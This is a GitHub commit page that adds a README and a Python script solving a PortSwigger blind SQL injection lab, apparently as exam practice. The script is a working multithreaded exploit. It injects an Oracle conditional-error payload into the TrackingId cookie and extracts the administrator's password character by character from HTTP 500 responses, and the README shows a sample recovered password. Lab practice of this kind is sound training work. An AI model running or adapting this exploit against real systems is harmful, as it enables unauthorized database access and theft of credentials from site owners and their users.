-
-
Notifications
You must be signed in to change notification settings - Fork 285
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Oracle blind boolean based multithreaded dataextration script
- Loading branch information
1 parent
0844d08
commit b08936c
Showing
2 changed files
with
116 additions
and
0 deletions.
There are no files selected for viewing
23 changes: 23 additions & 0 deletions
23
...s & Enhancements/Challenges/PortSwigger/lab-conditional-errors-Oracle/README.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,23 @@ | ||
| Multithreaded solution for the boolean based blind Oracle sql injection [challange](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors) of portswigger labs. | ||
|
|
||
| Since the OSWE exam focuses on sqli exploitation also I thought this would be good practice to make a multithreaded script for it. | ||
|
|
||
| Script works by first calling `login()` function which gets the session cookies since thats the injectino point. | ||
|
|
||
| Rather then writing a parser for the response headers and using the cookies from there a better way is to use `s = requests.Session()` and then access cookies using `s.cookies['cookieName']` | ||
|
|
||
|
|
||
| ### How to use | ||
| Just give the challange URL to the script and you'll be given the administrator's password | ||
|
|
||
| ```python | ||
|
|
||
| python lab-conditional-errors.py https://acaf1fc01f0db1fe803635d900bc00f1.web-security-academy.net/ | ||
| [*] Got Tracking Cookie: Ikc52pc6L4r7Xxi4 | ||
| -------------------- | ||
|
|
||
| Result :: et45s2ytyprf8ncumahu | ||
| ``` | ||
|
|
||
| #### Links | ||
| - https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors |
93 changes: 93 additions & 0 deletions
93
...hancements/Challenges/PortSwigger/lab-conditional-errors-Oracle/lab-conditional-errors.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,93 @@ | ||
| # | ||
| # Exploit Title : Practicing Oracle blind boolean sql injection multithreaded data extraction | ||
| # Author : OutHackThem | ||
| # Vulnerable Software : https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors | ||
| # | ||
| # Usage : The script has 3 function 1)booleanBlindSqli() which | ||
| # is used to extract the data using a provided query. | ||
| # 2)getQueryLength() which is used to get output length. | ||
| # 3)login() used to fetch the session cookies | ||
| # | ||
|
|
||
| import requests | ||
| import urllib3 | ||
| import string | ||
| import concurrent.futures | ||
| import time | ||
| import sys | ||
|
|
||
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | ||
| s = requests.Session() | ||
|
|
||
| rhost = sys.argv[1] | ||
|
|
||
|
|
||
| ## Used to get the session cookies since the injection point is TrackingId Cookie | ||
| def login(): | ||
|
|
||
| URL = f"{rhost}login" | ||
| r = s.get(URL) | ||
| print(f"[*] Got Tracking Cookie: {r.cookies['TrackingId']}") | ||
|
|
||
|
|
||
| ''' | ||
| ### The following function is used to calculate the length of the query that will be used to extract the data. | ||
| ### It has been commented right now because the result length is 20 if it happens to change you can uncomment. | ||
| ### and use this function | ||
| def getQueryLength(): | ||
| count = 1 | ||
| done = False | ||
| while not done: | ||
| query = f"'||(SELECT CASE WHEN length(password)>{count} THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'" | ||
| cookies = { | ||
| "session":s.cookies['session'], | ||
| "TrackingId":f"{s.cookies['TrackingId']}{query}" | ||
| } | ||
| print(cookies) | ||
| r = requests.get(rhost, cookies=cookies) | ||
| print(r.status_code) | ||
| if r.status_code != 500: | ||
| print(count) | ||
| done = True | ||
| break | ||
| else: | ||
| print('Finding Length...') | ||
| count +=1 | ||
| ''' | ||
|
|
||
|
|
||
| def booleanBlindSqli(index): | ||
| charSet = string.ascii_letters+string.digits | ||
|
|
||
| for charIndex in charSet: | ||
| query = f"'||(SELECT CASE WHEN SUBSTR(password,{index},1)='{charIndex}' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'" | ||
| cookies = { | ||
| "session":s.cookies['session'], | ||
| "TrackingId":f"{s.cookies['TrackingId']}{query}" | ||
| } | ||
|
|
||
| r = requests.get(rhost,cookies=cookies) | ||
|
|
||
| if r.status_code == 500: | ||
| sys.stdout.write('-') | ||
| sys.stdout.flush() | ||
| return charIndex | ||
| break | ||
| else: | ||
| pass | ||
|
|
||
| login() | ||
|
|
||
| with concurrent.futures.ThreadPoolExecutor(max_workers=50) as executor: | ||
| letters = executor.map(booleanBlindSqli, list(range(1,21))) | ||
|
|
||
| queryResult = "" | ||
| for letter in letters: | ||
| queryResult += letter | ||
|
|
||
| print(f'\n\nResult :: {queryResult}') |